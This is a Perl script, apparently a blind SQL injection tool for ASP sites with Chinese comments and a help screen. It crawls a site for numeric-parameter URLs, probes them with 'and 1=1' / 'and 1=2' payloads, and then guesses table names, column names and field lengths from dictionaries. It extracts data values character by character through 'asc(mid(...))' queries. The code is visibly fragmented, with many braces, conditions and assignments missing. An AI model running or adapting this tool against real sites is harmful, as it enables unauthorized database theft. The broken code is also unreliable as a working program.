use strict;
use LWP::UserAgent;
use HTML::LinkExtor;
use URI::URL;
use URI::Escape;
use 5.010001;
#use HTTP::Cookies;
my $ua=LWP::UserAgent->new(
'User-Agent'=>'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; iCafeMedia; .NET CLR 2.0.50727; CIBA)',
my %link;
my @link;
my $res;
my @inject_url;
my $table_fl="tables.txt";
my $line_fl="lines.txt";
print qq!\n
by LLC
&SQL_Inject(@inject_url); #注入
# 命令解析
sub Cmd_Anlz{
my @input_url;
while(defined(my $cmd=shift @_)){
when(/(^-u)|(^--url)/){ open URL,'<',shift @_ or die "ERROR\n";
foreach(<URL>){chomp $_;
push @input_url,$_};
when(/(^-t)|(^--table)/){$table_fl=shift @_}
when(/(^-l)|(^--line)/){$line_fl=shift @_}
when(/(^-i)|(^--inject)/){push(@inject_url,&Http_add(shift @_))}
default{die "ERROR COMMAND!\n"}
sub Progress{
my @tmp=@_;
map{$link{$_}=1} @tmp; #把url自身加入扫描列表
my $base;
my $p;
while(defined(my $input_url=shift @tmp)){
# Request document and parse it as it arrives
$res=$ua->request(HTTP::Request->new(GET=>$input_url),sub {$p->parse($_[0])});
@link=keys %link;
undef %link;
@link=map { $_ =url($_, $base)->abs; } @link;
#print join("\n",@link);
&Inject_get(@link); #扫描注入点
sub Http_add{
my $url=shift;
return $url;
sub callback {
my($tag, %attr) = @_;
return if ($tag ne 'a' and $tag ne 'link');
grep{++$link{$_}<2}values %attr;
sub Link_Anlz{
my @url;
while(defined (my $tmp=shift @_)){
push(@url,$tmp) if $tmp=~m/\.asp\?.*?=\d+((\s+)|((%20)+))?$/;
#print join("\n",@url);
return @url;
sub Inject_get{
my %url=();
while(defined(my $tmp=shift @_)){
$url{1}=$tmp.uri_escape(" and 1=1");
$url{2}=$tmp.uri_escape(" and 1=2");
for(my $i=0;$i<3;$i++){
if($url{0}->content eq $url{1}->content and $url{1}->content ne $url{2}->content){
print "GET注入点: \t$tmp\n";
push @inject_url,$tmp;
print "找不到注入点\n";
sub SQL_Inject{
return 0 unless(defined $inject_url[0]);
my @url=@_;
my @table;
my @line;
my @lenth;
my $success_url;
open TABLE,'<',"$table_fl" or die "can't open $table_fl\n";
print "\n猜表名 ing... \twait\n";
while(defined (my $url=shift @url)){
last if defined($table[0]);
while(defined (my $rd_line=<TABLE>)){
chomp $rd_line;
my $tmp=$ua->get($url.uri_escape(" and exists (select * from $rd_line)"));
#print $url.uri_escape(" and exists (select * from $rd_line)")."\n";
if($tmp->status_line=~/20/ and $tmp->content eq $res->content){
push @table,$rd_line;
print "TABLE NAME:\t$rd_line\n";
unless(defined $table[0]){
print "猜表失败,请尝试其他表字典\n";
return 0;
################### 列名 #####################
print "\n猜列名==>\t请输入表名:(表名间以\",\"分割)\nTABLE NAME:\t";
my $in_table=<stdin>;
chomp $in_table;
open LINE,'<',"$line_fl" or die "can't open $line_fl\n";
print "\n表名==> \t列名\n";
foreach my $table(@table){
while(defined (my $rd_line=<LINE>)){
chomp $rd_line;
my $tmp=$ua->get($success_url.uri_escape(" and exists (select $rd_line from $table)"));
#print $success_url." and exists (select $rd_line from $table)"."\n";
if($tmp->status_line=~/20/ and $tmp->content eq $res->content){
push @line,$rd_line;
print "$table==>\t$rd_line\n";
unless(defined $line[0]){
print "猜列失败,请尝试其他表字典\n";
return 0;
print "\n猜列长==>\t请输入表名:列名:(多个列名间以\",\"分割)\n";
my $lines=<stdin>;
chomp $lines;
my $table;
foreach my $line(@line){
my $i=0;
my $tmp;
do{ $i++;
$tmp=$ua->get($success_url.uri_escape(" and (select top 1 len($line) from $table)>$i"));
} while($tmp->content eq $res->content);
print "$table==>$line:\t$i\n";
push @lenth,$i;
print "\n猜解字段的值\n";
for(my $i=0;scalar @line>$i;$i++){
my $line=$line[$i];
my $lenth=$lenth[$i];
my @asc_value;
my $tmp;
print "\n$table=>$line:";
for(my $j=1;$lenth+1>$j;$j++){
my $mid=79;
$tmp=$ua->get($success_url.uri_escape(" and (select top 1 asc(mid($line,$j,1)) from $table)>$mid"));
if($tmp->content ne $res->content){
push @asc_value,$high;
print "$high--";
print "\nRESULT:\t".join("",(map{chr($_)}@asc_value));
print qq~\n
++++++++++++++++++++++++++++++++++++++ END ++++++++++++++++++++++++++++++++++++
sub Half{
my ($ruselt,$value)=@_;
return int(($high+$low)/2);
return int(($high+$low)/2);
sub Help_line{
print q~
(1) -t 或 --table 加文件名 ==> 数据库的表字典,默认为tables.txt
(2) -i 或 --line 加文件名 ==> 数据库的列字典,默认为lines.txt
(3) -u 或 --url 加文件名 ==> 读取url字典,请求字典中的url
如果不加 "-参数",则只对输入的url进行上述操作。
(4) -i 或 --inject 加注入点url==>直接对该注入点进行注入
(5) -h 或 --help 查看此条帮助信息
EXP: ***.pl www.xxx.com/news.asp?
***.pl -i www.xxx.com:8080/news.asp?id=13 --table form.txt
NAME:SQL Inject Version:1.0 By:LLC E_mail:183229003@qq.com
sub Inject_cookie{
my %cookie=();
my $tmp=shift;
my $cookie_jar=HTTP::Cookies->new(file=>'tmp.dat',autosave=>1,);
#while(defined(my $tmp=shift @_)){
my $url_base=$1;
my $url_id=$3;
my $url_num=$4;
print "\n $1\t$3\t$4\n";
$cookie{1}=uri_escape("$url_id and 1=1");
$cookie{2}=uri_escape("$url_id and 1=2");
#print $cookie{0}->content;
#print "cookie\n" if ($res->content eq $cookie{0}->content)
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